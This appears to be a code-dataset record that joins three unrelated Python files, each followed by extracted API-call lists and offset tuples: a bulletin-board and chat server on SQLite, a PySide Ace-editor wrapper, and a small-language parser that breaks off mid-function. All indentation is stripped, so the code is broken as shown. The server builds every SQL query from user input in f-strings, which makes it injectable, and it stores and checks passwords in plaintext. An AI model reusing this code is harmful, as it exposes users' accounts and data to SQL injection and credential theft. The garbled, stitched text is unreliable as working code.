return { "command":command, "data":data }
def usrReg(username, email, password):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM user WHERE name='{username}'")
if c.fetchone() is None:
c.execute(f"INSERT INTO USER VALUES (null,'{username}','{email}','{password}')")
con.commit()
con.close()
return 0
else:
con.close()
return -1
def usrlogin(username, password):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM user WHERE name='{username}' AND password='{password}'")
result = c.fetchone()
con.close()
if result != None:
return result[0]
else:
return -1
def listusers():
con = sqlite3.connect(db_path)
c = con.cursor()
msg = 'Name'.ljust(15, ' ') + 'Email'.ljust(20, ' ') + '\n'
for row in c.execute('SELECT * FROM user ORDER BY id'):
msg = msg + str(row[1]).ljust(15, ' ') + str(row[2]).ljust(20, ' ') + '\n'
con.close()
return msg
def listboards():
con = sqlite3.connect(db_path)
c = con.cursor()
msg = 'Index'.ljust(15, ' ') + 'Name'.ljust(15, ' ') + 'Moderator'.ljust(15, ' ') + '\n'
for row in c.execute('SELECT * FROM board ORDER BY "index"'):
msg = msg + str(row[0]).ljust(15, ' ') + str(row[1]).ljust(15, ' ') + str(row[2]).ljust(15, ' ') + '\n'
con.close()
return msg
def addBoard(board_name,moderator):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM BOARD WHERE name='{board_name}'")
if c.fetchone() is None:
c.execute(f"INSERT INTO BOARD VALUES (null,'{board_name}','{moderator}')")
con.commit()
con.close()
return 0
else:
con.close()
return -1
def postExist(post_SN):
if (int(post_SN) <= Post.counter and posts[int(post_SN)].available == True):
return True
else:
return False
def listposts(board_name):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM BOARD WHERE name='{board_name}'")
if c.fetchone() is None: return "Board does not exist."
else:
msg = 'S/N'.ljust(10, ' ') + 'Title'.ljust(15, ' ') + 'Author'.ljust(15, ' ') + 'Date'.ljust(15, ' ') + '\n'
for p in posts:
if (p.available == True and p.board == board_name) :
msg += str(p.SN).ljust(10, ' ') + p.title.ljust(15, ' ') + p.author.ljust(15, ' ') + p.date.ljust(15, ' ') + '\n'
return msg
def addPost(board,title,author,content):
con = sqlite3.connect(db_path)
c = con.cursor()
c.execute(f"SELECT * FROM BOARD WHERE name='{board}'")
if c.fetchone() is None:
return -1
else:
global posts
today = date.today()
MD = f"{today.month}/{today.day}"
#posts[board] = {f'{post_counter}:[{post_counter},{board},{title},{author},{MD},{content}]'}
post = Post(board,title,author,MD,content)
posts.append(post)
return 0
def listrooms():
msg = 'chatroom-name'.ljust(15, ' ') + 'status'.ljust(8, ' ') + '\n'
for k in Chatrooms:
msg = msg + k.ljust(15, ' ') + Chatrooms[k]["status"].ljust(8, ' ') + '\n'
return msg
class tcpCmdHandler(dp.Data_Parser):
command = dp.CommandListener("tcp")
cmdlist = command.tcp_savecmds
def __init__(self, lock, addr):
dp.Data_Parser.__init__(self,lock)
self.addr=addr
@command.listen()
def login(self,jMsg,username,password):
if (jMsg["user"] != "none"):
command = 'none'
sendmsg = 'Please logout first!'
else:
uid = usrlogin(username,password)
if (uid != -1):
command = f'setuser {username} {uid}'
sendmsg = f'Welcome, {username}.'
else:
command = 'none'
sendmsg = 'Login failed.'
return make_jsend(command,sendmsg)
@command.listen(name="get-ip")
def get_ip(self,jMsg):
command = 'none'
sendmsg = f'IP: {self.addr[0]}:{self.addr[1]}'
return make_jsend(command,sendmsg)
@command.listen()
def logout(self,jMsg):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif jMsg["user"] in Chatrooms and Chatrooms[ jMsg["user"] ]["status"]=="open":
command = "none"
sendmsg = 'Please do "attach" and "leave-chatroom" first.'
else:
command = "logout"
sendmsg = f"Bye, {jMsg['user']}"
if jMsg["user"] in Chatrooms : Chatrooms.pop(jMsg["user"])
return make_jsend(command,sendmsg)
@command.listen(name="list-user")
def listuser(self,jMsg):
command = "none"
sendmsg = listusers()
return make_jsend(command,sendmsg)
@command.listen()
def exit(self,jMsg):
if jMsg["user"] in Chatrooms : Chatrooms.pop(jMsg["user"])
command = "exit"
sendmsg = ""
return make_jsend(command,sendmsg)
######## Bulletin Board System ########
@command.listen(name="create-board")
def create_board(self,jMsg,name):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
check = addBoard(name,jMsg["user"])
if check == 0 :
command = "none"
sendmsg = "Create board successfully."
else:
command = "none"
sendmsg = 'Board already exists.'
return make_jsend(command,sendmsg)
@command.listen(name="create-post", usage="<board-name> --title <title> --content <content>")
def create_post(self,jMsg,board,title,content):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
self.lock.acquire()
check = addPost(board,title,jMsg['user'],content)
self.lock.release()
if check == 0 :
command = "none"
sendmsg = "Create post successfully."
else:
command = "none"
sendmsg = "Board does not exist."
return make_jsend(command,sendmsg)
@command.listen(name="list-board")
def list_board(self,jMsg):
command = "none"
sendmsg = listboards()
return make_jsend(command,sendmsg)
@command.listen(name="list-post", usage="<board-name>")
def list_post(self,jMsg,board_name):
self.lock.acquire()
command = "none"
sendmsg = listposts(board_name)
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(usage="<post-S/N>")
def read(self,jMsg,post_SN):
self.lock.acquire()
if( postExist(post_SN) ):
command = "none"
sendmsg = posts[int(post_SN)].read()
else:
command = "none"
sendmsg = "Post does not exist."
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(name="delete-post", usage="<post-S/N>")
def delete_post(self,jMsg,post_SN):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
global posts
self.lock.acquire()
if (postExist(post_SN)):
if(posts[int(post_SN)].author == jMsg['user']):
posts[int(post_SN)] = emptypost()
command = "none"
sendmsg = "Delete successfully."
else:
command = "none"
sendmsg = "Not the post owner."
else:
command = "none"
sendmsg = "Post does not exist."
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(name="update-post", usage="<post-S/N> --title/content <new>")
def update_post(self,jMsg,post_SN,which,inf):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
global posts
self.lock.acquire()
if (postExist(post_SN)):
if(posts[int(post_SN)].author == jMsg['user']):
if(which=="title"):
posts[int(post_SN)].title = inf
if(which=="content"):
posts[int(post_SN)].content = inf
command = "none"
sendmsg = "Update successfully."
else:
command = "none"
sendmsg = "Not the post owner."
else:
command = "none"
sendmsg = "Post does not exist."
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(usage="<post-S/N> <comment>")
def comment(self,jMsg,post_SN,comment):
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
global posts
self.lock.acquire()
if (postExist(post_SN)):
posts[int(post_SN)].comment(jMsg['user'],comment)
command = "none"
sendmsg = "Comment successfully."
else:
command = "none"
sendmsg = "Post does not exist."
self.lock.release()
return make_jsend(command,sendmsg)
################### Chat-Server ########################
@command.listen(name="create-chatroom")
def create_chatroom(self,jMsg,port):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif jMsg["user"] in Chatrooms :
command = "none"
sendmsg = "User has already created the chatroom."
else:
Chatrooms[ jMsg["user"] ] = { "port":port, "status":"open" }
command = f"create_chatroom {port}"
sendmsg = ""
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(name="join-chatroom")
def join_chatroom(self,jMsg,chatroom_name):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif (chatroom_name not in Chatrooms) or (Chatrooms[chatroom_name]["status"]=="close"):
command = "none"
sendmsg = "The chatroom does not exist or the chatroom is close."
else:
port = Chatrooms[ chatroom_name ]["port"]
owner = chatroom_name
command = f"join_chatroom {owner} {port}"
sendmsg = ""
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen(name="restart-chatroom")
def restart_chatroom(self,jMsg):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif (jMsg["user"] not in Chatrooms):
command = "none"
sendmsg = "Please create chatroom first."
elif (Chatrooms[ jMsg["user"] ]["status"]=="open"):
command = "none"
sendmsg = "Your chatroom is still running."
else:
port = Chatrooms[ jMsg["user"] ]["port"]
Chatrooms[ jMsg["user"] ]["status"]="open"
owner = jMsg["user"]
command = f"join_chatroom {owner} {port}"
sendmsg = ""
self.lock.release()
return make_jsend(command,sendmsg)
@command.listen()
def close_chatroom(self,jMsg):
global Chatrooms
self.lock.acquire()
Chatrooms[ jMsg['user'] ]["status"]="close"
self.lock.release()
command = "none"
sendmsg = "none"
return make_jsend(command,sendmsg)
@command.listen()
def attach(self,jMsg):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
elif (jMsg["user"] not in Chatrooms):
command = "none"
sendmsg = "Please create-chatroom first."
elif (Chatrooms[jMsg["user"]]["status"]=="close"):
command = "none"
sendmsg = "Please restart-chatroom first."
else:
port = Chatrooms[ jMsg["user"] ]["port"]
owner = jMsg["user"]
command = f"join_chatroom {owner} {port}"
sendmsg = ""
self.lock.release()
return make_jsend(command,sendmsg)
########################################################
class udpCmdHandler(dp.Data_Parser):
command = dp.CommandListener("udp")
cmdlist = command.udp_savecmds
def __init__(self,lock):
dp.Data_Parser.__init__(self,lock)
@command.listen()
def hello(self,jMsg):
command = "none"
sendmsg = "hello!"
return make_jsend(command,sendmsg)
@command.listen()
def register(self,jMsg,username,email,password):
check = usrReg(username,email,password)
if check == 0 :
command = "none"
sendmsg = "Register successfully."
else:
command = "none"
sendmsg = 'Username is already used.'
return make_jsend(command,sendmsg)
@command.listen()
def whoami(self,jMsg):
if (jMsg["user"] != "none"):
command = "none"
sendmsg = jMsg["user"]
else:
command = "none"
sendmsg = "Please login first!"
return make_jsend(command,sendmsg)
@command.listen()
def hi(self,jMsg):
command = "none"
sendmsg = "hi."
return make_jsend(command,sendmsg)
@command.listen(name="list-chatroom")
def list_chatroom(self,jMsg):
global Chatrooms
self.lock.acquire()
if (jMsg["user"] == "none"):
command = "none"
sendmsg = "Please login first!"
else:
command = "none"
sendmsg = listrooms()
self.lock.release()
return make_jsend(command,sendmsg)
|
[
"dataparser.Data_Parser.__init__",
"dataparser.CommandListener",
"sqlite3.connect",
"datetime.date.today"
] |
[((1558, 1582), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (1573, 1582), False, 'import sqlite3\n'), ((1938, 1962), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (1953, 1962), False, 'import sqlite3\n'), ((2222, 2246), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (2237, 2246), False, 'import sqlite3\n'), ((2535, 2559), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (2550, 2559), False, 'import sqlite3\n'), ((2935, 2959), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (2950, 2959), False, 'import sqlite3\n'), ((3472, 3496), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (3487, 3496), False, 'import sqlite3\n'), ((4072, 4096), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (4087, 4096), False, 'import sqlite3\n'), ((4792, 4817), 'dataparser.CommandListener', 'dp.CommandListener', (['"""tcp"""'], {}), "('tcp')\n", (4810, 4817), True, 'import dataparser as dp\n'), ((14503, 14528), 'dataparser.CommandListener', 'dp.CommandListener', (['"""udp"""'], {}), "('udp')\n", (14521, 14528), True, 'import dataparser as dp\n'), ((4275, 4287), 'datetime.date.today', 'date.today', ([], {}), '()\n', (4285, 4287), False, 'from datetime import date\n'), ((4902, 4937), 'dataparser.Data_Parser.__init__', 'dp.Data_Parser.__init__', (['self', 'lock'], {}), '(self, lock)\n', (4925, 4937), True, 'import dataparser as dp\n'), ((14606, 14641), 'dataparser.Data_Parser.__init__', 'dp.Data_Parser.__init__', (['self', 'lock'], {}), '(self, lock)\n', (14629, 14641), True, 'import dataparser as dp\n')]
|
from PySide.QtCore import QObject, Signal, Slot
from string import Template
import os
EVENT_TEMPLATE = Template("""
py_${func} = function() {
py_ace_editor.${func}(${args});
}
editor.${target}.on("${event_name}", py_${func});
""")
BINDING_TEMPLATE = Template("""
py_ace_editor.${signal}.connect(${target}, "${func}")
""")
class QtAceEditor(QObject):
text_changed = Signal(unicode)
mode_changed = Signal(unicode)
theme_changed = Signal(unicode)
auto_pair_changed = Signal(bool)
font_size_changed = Signal(int)
margin_line_changed = Signal(bool)
margin_line_column_changed = Signal(int)
def __init__(self, parent=None):
""" Initialize the editor
"""
super(QtAceEditor, self).__init__(parent)
self._events = []
self._bindings = []
def set_text(self, text):
""" Set the text of the editor
"""
self._text = text
self.text_changed.emit(text)
@Slot(unicode)
def set_text_from_js(self, text):
""" Set the text from the javascript editor. This method is required
because set_text emits the signal to update the text again.
"""
self._text = text
def text(self):
""" Return the text of the editor
"""
return self._text
def set_mode(self, mode):
""" Set the mode of the editor
"""
if mode.startswith('ace/mode/'):
self._mode = mode
else:
self._mode = 'ace/mode/' + mode
self.mode_changed.emit(self._mode)
def mode(self):
""" Return the mode of the editor
"""
return self._mode
def set_theme(self, theme):
""" Set the theme of the editor
"""
if theme.startswith('ace/theme/'):
self._theme = theme
else:
self._theme = "ace/theme/" + theme
self.theme_changed.emit(self._theme)
def theme(self):
""" Return the theme of the editor
"""
return self._theme
def set_auto_pair(self, auto_pair):
""" Set the auto_pair behavior of the editor
"""
self._auto_pair = auto_pair
self.auto_pair_changed.emit(auto_pair)
def set_font_size(self, font_size):
""" Set the font size of the editor
"""
self._font_size = font_size
self.font_size_changed.emit(font_size)
def show_margin_line(self, margin_line):
""" Set the margin line of the editor
"""
self._margin_line = margin_line
self.margin_line_changed.emit(margin_line)
def set_margin_line_column(self, margin_line_col):
""" Set the margin line column of the editor
"""
self._margin_line_column = margin_line_col
self.margin_line_column_changed.emit(margin_line_col)
def generate_ace_event(self, _func, _target, _args, _event_name):
""" Generate a Javascript ace editor event handler.
Parameters
-----------
_func : string
The python method to be called on the python AceEditor object
_args : string
The javascript expression to pass to the method
_target : string
The Ace Editor target to tie the event to
_event_name : string
The name of the AceEditor event
"""
event = EVENT_TEMPLATE.substitute(func=_func, args=_args,
target=_target,
event_name=_event_name)
self._events.append(event)
def generate_binding(self, _signal, _target, _func):
""" Generate a connection between a Qt signal and a javascript function.
Any parameters given to the signal will be passed to the javascript
function.
Parameters
----------
_signal : string
The name of the Qt signal
_target : string
The name of the target Javascript object
_func : string
The name of the function to call on the target object
"""
binding = BINDING_TEMPLATE.substitute(signal=_signal, target=_target,
func=_func)
self._bindings.append(binding)
def generate_html(self):
""" Generate the html code for the ace editor
"""
# XXX better way to access files here?
p = os.path
template_path = p.join(p.dirname(p.abspath(__file__)),
'tab_ace_test.html')
template = Template(open(template_path, 'r').read())
_r_path = "file://" + p.join(p.dirname(p.abspath(__file__)))
_events = '\n'.join(self._events)
_bindings = '\n'.join(self._bindings)
return template.substitute(events=_events, resource_path=_r_path,
bindings=_bindings)
|
[
"PySide.QtCore.Slot",
"PySide.QtCore.Signal",
"string.Template"
] |
[((104, 261), 'string.Template', 'Template', (['"""\n py_${func} = function() {\n py_ace_editor.${func}(${args});\n }\n editor.${target}.on("${event_name}", py_${func});\n"""'], {}), '(\n """\n py_${func} = function() {\n py_ace_editor.${func}(${args});\n }\n editor.${target}.on("${event_name}", py_${func});\n"""\n )\n', (112, 261), False, 'from string import Template\n'), ((272, 347), 'string.Template', 'Template', (['"""\n py_ace_editor.${signal}.connect(${target}, "${func}")\n"""'], {}), '("""\n py_ace_editor.${signal}.connect(${target}, "${func}")\n""")\n', (280, 347), False, 'from string import Template\n'), ((397, 412), 'PySide.QtCore.Signal', 'Signal', (['unicode'], {}), '(unicode)\n', (403, 412), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((432, 447), 'PySide.QtCore.Signal', 'Signal', (['unicode'], {}), '(unicode)\n', (438, 447), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((468, 483), 'PySide.QtCore.Signal', 'Signal', (['unicode'], {}), '(unicode)\n', (474, 483), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((508, 520), 'PySide.QtCore.Signal', 'Signal', (['bool'], {}), '(bool)\n', (514, 520), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((545, 556), 'PySide.QtCore.Signal', 'Signal', (['int'], {}), '(int)\n', (551, 556), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((583, 595), 'PySide.QtCore.Signal', 'Signal', (['bool'], {}), '(bool)\n', (589, 595), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((629, 640), 'PySide.QtCore.Signal', 'Signal', (['int'], {}), '(int)\n', (635, 640), False, 'from PySide.QtCore import QObject, Signal, Slot\n'), ((982, 995), 'PySide.QtCore.Slot', 'Slot', (['unicode'], {}), '(unicode)\n', (986, 995), False, 'from PySide.QtCore import QObject, Signal, Slot\n')]
|
import logging
import nodes
from .. import exceptions
from ..lexer import tokens
import traceback
import sys
class SyntaxTree(object):
def _debug(self, text, *args):
if type(text) != str:
text = repr(text)
logging.debug(("<Line %d, Token %d> " % (self.line_num, self.token_counter)) + text, *args)
def _inc_line(self):
self.line_num += 1
self.token_counter = 0
def execute(self, context, time_limit=-1, op_limit=-1):
context.set_op_limit(op_limit)
context.set_time_limit(time_limit)
for expression in self.tree:
expression.reduce(context)
return context
@property
def next_token(self):
try:
return self.tokens[0]
except IndexError:
raise exceptions.OutOfTokens(self.line_num, 'at next token')
def shift_token(self):
self._debug('Shifting token %s', self.next_token)
self.token_counter += 1
try:
token = self.tokens.pop(0)
self.line_num = token.line_num
return token
except IndexError:
raise exceptions.ParseError(self.line_num, "Unexpected end of input")
def unshift_token(self, item):
return self.tokens.insert(0, item)
def __init__(self, context_class, tokens):
self.tokens = tokens
self.tree = nodes.Branch([])
self.line_num = 0
self.context_class = context_class
self.token_counter = 0
def is_identifier(self, token, body):
return isinstance(token, tokens.IdentifierToken) and \
token.body == body
def run(self):
while True:
try:
# look ahead and if there is a binaryoperator in our future,
# handle it
self.tree.append(self.handle_expression())
except exceptions.OutOfTokens as e:
self._debug('*** Out of tokens: %s', e.message)
for line in self.tree:
self._debug("FINAL AST: %s", line)
break
except exceptions.EndContextExecution:
logging.error('Unexpected }')
raise exceptions.ParseError(self.line_num, "Unexpected }")
def dump(self):
for line_num, branch in enumerate(self.tree):
self._debug("Operation %d:\n%s", line_num, branch)
def handle_function_definition(self):
self._debug("Handling a function definition")
self.shift_token() # get rid of (
sig_names = []
while True:
token = self.shift_token()
if isinstance(token, tokens.RightParenToken):
self._debug("Found right paren, continue with rest of function definition")
break # get rid of it
if isinstance(token, tokens.CommaToken):
self._debug("Found comma, continue to next argument")
continue # eat it
if not isinstance(token, tokens.IdentifierToken):
raise exceptions.ParseError(self.line_num,
"Expected an argument name, got %s" % token)
sig_names.append(token.body)
if not isinstance(self.next_token, tokens.LeftCurlyBraceToken):
raise exceptions.ParseError(self.line_num, "Expected {, got %s" % self.next_token)
self.shift_token() # get rid of {
new_branch = nodes.Branch()
while True:
try:
new_branch.append(self.handle_expression())
except exceptions.EndContextExecution:
# end of function declaration
break
func_node = nodes.FunctionNode(self.line_num, self.context_class, sig_names, new_branch)
return func_node
def handle_subscript_notation(self, variable_token):
self._debug("Handling a subscript notation")
self.shift_token() # get rid of [
index_node = self.handle_operator_expression() # ends before ]
sub_node = nodes.SubscriptNotationNode(self.line_num,
nodes.VariableNode(self.line_num, variable_token.body), index_node)
if not isinstance(self.next_token, tokens.RightSquareBraceToken):
raise exceptions.ParseError(self.line_num,
"Unexpected %s during subscript notation parse" %
self.next_token)
self.shift_token()
return sub_node
def handle_function_invocation(self, name_token):
self._debug("Handling a function invocation")
self.shift_token() # get rid of (
arg_tokens = []
self._debug("Examining arguments")
while True:
token = self.next_token
self._debug("Current argument set: %s", repr(arg_tokens))
self._debug("Function Invocation: Consider %s" % token)
if isinstance(token, tokens.RightParenToken):
self.shift_token()
break
arg = self.handle_operator_expression()
if arg is None:
raise exceptions.ParseError(self.line_num,
"Unexpected character")
arg_tokens.append(arg)
if isinstance(self.next_token, tokens.CommaToken):
self._debug("Found comma, continue to next argument")
# eat the comma and keep going
self.shift_token()
continue
self._debug("Done reading arguments in function invocation")
return nodes.InvocationNode(self.line_num, name_token.body, arg_tokens)
def handle_list_expression(self):
self._debug("Handling a list expression")
self.shift_token() # get rid of [
data = nodes.ListNode()
while isinstance(self.next_token, tokens.LineTerminatorToken):
# ignore line breaks here until we see data
self.shift_token()
while True:
self._debug("List looks like this now: %s", data)
if isinstance(self.next_token, tokens.RightSquareBraceToken):
self._debug(
"Encountered a ], shift it off and return the list node.")
self.shift_token()
break
expression = self.handle_operator_expression()
if isinstance(self.next_token, tokens.CommaToken):
# eat the comma and keep going
self.shift_token()
if expression is not None:
data.append(expression)
return data
def handle_dictionary_expression(self):
self._debug("Handling a dictionary expression")
self.shift_token() # get rid of {
data = nodes.DictionaryNode(self.line_num)
while True:
name = self.shift_token()
if isinstance(name, tokens.LineTerminatorToken):
# So, we can have whitespace after a {
self._inc_line()
continue
if isinstance(name, tokens.RightCurlyBraceToken):
# done with this dictionary since we got a }
break
if not isinstance(name, tokens.IdentifierToken) and \
not isinstance(name, tokens.NumberLiteralToken) and \
not isinstance(name, tokens.StringLiteralToken):
raise exceptions.ParseError(self.line_num,
"Expected a name, got %s (%s)" %
(name, name.__class__))
colon = self.shift_token()
if not isinstance(colon, tokens.ColonToken):
raise exceptions.ParseError(self.line_num, "Expected a colon")
# Goes until the end of a line. No comma needed!
expression = self.handle_operator_expression()
if expression is not None:
data[name.body] = expression
return data
def handle_operator_expression(self):
self._debug("Handling operator expression.")
output = []
op_stack = []
prev_token = None
# keep track of the parens opened.
# If we deplete all the (s, stop parsing the operator expression
paren_count = 0
while True:
self._debug("Output stack: %s", output)
self._debug("Operator stack: %s", op_stack)
try:
self._debug('The next token is %s', self.next_token)
if isinstance(self.next_token,
tokens.LeftCurlyBraceToken):
self._debug(">> Calling handle_dictionary_expression from operator_expression")
output.append(self.handle_dictionary_expression())
elif isinstance(self.next_token,
tokens.LeftSquareBraceToken):
self._debug(">> Calling handle_list_expression from operator_expression")
output.append(self.handle_list_expression())
elif isinstance(self.next_token,
tokens.RightCurlyBraceToken):
self._debug(
">> } encountered, stop processing operator expression")
self._debug(
str(paren_count))
if paren_count > 0:
self._debug("Paren count is over 1 while a } has been encountered.")
raise exceptions.ParseError("Unexpected }")
break
elif isinstance(self.next_token,
tokens.RightSquareBraceToken):
self._debug(
">> ] encountered, stop processing operator expression")
if paren_count > 0:
self._debug("Paren count is over 1 while a } has been encountered.")
raise exceptions.ParseError("Unexpected }")
break
if isinstance(self.next_token, tokens.LeftParenToken):
self._debug('Incrementing number of parens.')
paren_count += 1
if isinstance(self.next_token, tokens.RightParenToken):
paren_count -= 1
self._debug(">> Decrementing number of parens.")
if paren_count < 1:
self._debug(">> Found an unmatched ), which means this is the end of the operator expression")
# too many )s found. This is the end of
# the operator expression
break
if isinstance(self.next_token, tokens.RightParenToken):
self._debug("THE RIGHT PAREN IS HERE")
self._debug('Parent Count: %d', paren_count)
token = self.shift_token()
self._debug("Operator context: Consider %s", token)
except IndexError:
self._debug("Encountered IndexError, break")
break
if isinstance(token, tokens.LineTerminatorToken) or \
isinstance(token, tokens.RightCurlyBraceToken) or \
isinstance(token, tokens.CommaToken):
self._debug(
'encountered a line terminator, comma, or }, break it out')
if isinstance(token, tokens.LineTerminatorToken):
self._inc_line()
break
if (prev_token is None or
isinstance(prev_token, tokens.OperatorToken)) and \
isinstance(token, tokens.SubtractionOperatorToken):
# unary -
token = tokens.NegationOperatorToken()
if not isinstance(token, tokens.OperatorToken) and not \
isinstance(token, tokens.LiteralToken) and not \
isinstance(token, tokens.IdentifierToken):
msg = "Expected an operator, literal, or identifier. (Got %s: %s)" % \
(token.__class__, token.body)
logging.error(msg)
raise exceptions.ParseError(self.line_num, msg)
if isinstance(token, nodes.Node) or not \
isinstance(token, tokens.OperatorToken):
# If anything is a node, append it
if isinstance(self.next_token, tokens.LeftParenToken):
# function invocation or definition
if token.body == 'function':
output.append(self.handle_function_definition())
else:
output.append(self.handle_function_invocation(token))
elif isinstance(self.next_token,
tokens.LeftSquareBraceToken):
# subscript syntax
output.append(self.handle_subscript_notation(token))
else:
output.append(token)
else:
while len(op_stack) > 0:
token2 = op_stack[-1]
is_left_associative = \
token.associativity == tokens.OperatorToken.LEFT
is_right_associative = \
token.associativity == tokens.OperatorToken.RIGHT
self._debug("Is Left Associative: %s\t"
"Is Right Associative: %s",
is_left_associative, is_right_associative)
if (is_left_associative and token.precedence >= token2.precedence) or \
(is_right_associative and
token.precedence > token2.precedence):
if not isinstance(token, tokens.RightParenToken):
if not isinstance(token2,
tokens.LeftParenToken):
op_token = op_stack.pop()
self._debug(
"Popping %s off stack", op_token.body)
output.append(op_token)
else:
# break because we hit a left paren
break
else:
if not isinstance(token2,
tokens.LeftParenToken):
op_token = op_stack.pop()
output.append(op_token)
else:
# discard left paren and break
op_stack.pop()
break
else:
# left operator is equal or larger than right. breakin
break
if not isinstance(token, tokens.RightParenToken):
# push current operator to stack
op_stack.append(token)
# ignore right paren
# hold onto this for the next run in case we need to
# check for unary operators
prev_token = token
self._debug('Done feeding in tokens, now drain the operator stack')
# drain the operator stack
while len(op_stack) > 0:
operator = op_stack.pop()
output.append(operator)
self._debug('Output: ')
self._debug(output)
if len(output) == 0:
# nothing. probably a \n after a ,
return None
tree_stack = []
# turn the list of output tokens into a tree branch
self._debug('Turn list of output tokens into a tree branch')
while True:
try:
token = output.pop(0)
self._debug("Consider %s from output" % token)
except IndexError:
break
if not isinstance(token, tokens.OperatorToken):
tree_stack.append(self.handle_token(token))
else:
self._debug("Tree stack: %s", tree_stack)
self._debug("Determining if %s is unary or binary", token)
if isinstance(token, tokens.BinaryOperatorToken):
self._debug("%s is binary", token)
try:
right, left = tree_stack.pop(), tree_stack.pop()
except IndexError:
logging.error("Encountered IndexError. Tree stack: %s",
tree_stack)
raise exceptions.ParseError(self.line_num)
tree_stack.append(token.get_node(self.line_num, left, right))
elif isinstance(token, tokens.UnaryOperatorToken):
self._debug("%s is unary", token)
target = tree_stack.pop()
tree_stack.append(token.get_node(self.line_num, target))
self._debug("%s" % tree_stack)
if len(tree_stack) != 1:
logging.error("Tree stack length is not 1. Contents: %s",
tree_stack)
if len(tree_stack) != 1:
raise exceptions.ParseError(self.line_num)
self._debug('The final tree leaf: %s', tree_stack[0])
return tree_stack.pop() # -----------===============#################*
def handle_token(self, token):
self._debug("handle token")
if isinstance(token, nodes.Node) or isinstance(token, nodes.ListNode) or \
isinstance(token, nodes.DictionaryNode):
# already resolved down the chain
self._debug("This token is actually a node, so return it")
return token
elif isinstance(token, tokens.IdentifierToken):
# variable?
if token.body == 'true':
return nodes.BooleanNode(self.line_num, True)
elif token.body == 'false':
return nodes.BooleanNode(self.line_num, False)
self._debug("Deciding that %s is a variable" % token)
return nodes.VariableNode(self.line_num, token.body)
elif isinstance(token, tokens.NumberLiteralToken):
return nodes.NumberNode(self.line_num, token.body)
elif isinstance(token, tokens.StringLiteralToken):
return nodes.StringNode(self.line_num, token.body)
assert "Unexpected token: %s (%s)" % (token, token.__class__)
def handle_expression(self):
while True:
try:
self._debug('Handling expression')
token = self.next_token
self._debug("Consider %s", token.__class__)
except IndexError:
# didn't shift the token off yet so make sure the line num is accurate
raise exceptions.OutOfTokens(self.line_num + 1, 'During handle expression')
if isinstance(token, tokens.IdentifierToken) or \
isinstance(token, tokens.LiteralToken):
if self.handler_exists(token):
return self.handle_identifier()
else:
return self.handle_operator_expression()
elif isinstance(token, tokens.LineTerminatorToken):
self._debug("Delete this infernal line terminator")
self._inc_line()
self.shift_token()
return nodes.NopNode(self.line_num)
elif isinstance(token, tokens.RightCurlyBraceToken):
self._debug("Found }, beat it")
self.shift_token()
raise exceptions.EndContextExecution(self.line_num)
else:
raise exceptions.ParseError(self.line_num)
def handler_exists(self, token):
self._debug("* Checking if there is a handler for %s" % token)
method_name = 'handle_identifier_' + token.body
return hasattr(self, method_name)
def handle_identifier(self):
token = self.shift_token()
method_name = 'handle_identifier_' + token.body
method = getattr(self, method_name)
return method(token)
def handle_identifier_if(self, token):
self._debug("Handling IF")
condition = self.handle_operator_expression()
then_branch = nodes.Branch([])
else_branch = nodes.Branch([])
while not isinstance(self.next_token, tokens.IdentifierToken) or \
self.next_token.body not in ['else', 'end']:
self._debug("Checking next expression as part of THEN clause")
try:
then_branch.append(self.handle_expression())
except exceptions.EndContextExecution:
logging.error("There shouldn't be a } here "
"because we're in an if statement")
raise exceptions.ParseError(self.line_num, "Unexpected }")
except exceptions.OutOfTokens:
raise exceptions.SaulRuntimeError(self.line_num,
"Unexpected end of file during if statement")
if isinstance(self.next_token, tokens.IdentifierToken) and \
self.next_token.body == 'else':
self.shift_token()
while not isinstance(self.next_token, tokens.IdentifierToken) or \
self.tokens[0:2] != ['end', 'if']:
self._debug(
"Checking next expression as part of ELSE clause")
try:
else_branch.append(self.handle_expression())
except exceptions.EndContextExecution:
logging.error("There shouldn't be a } here "
"because we're in an if statement")
raise exceptions.ParseError(self.line_num, "Unexpected }")
except exceptions.OutOfTokens:
raise exceptions.SaulRuntimeError(self.line_num,
"Unexpected end of file during if statement")
end_token = self.shift_token()
if_token = self.shift_token()
self._debug("Then: %s, Else: %s, End If: %s %s",
then_branch, else_branch, end_token.body, if_token.body)
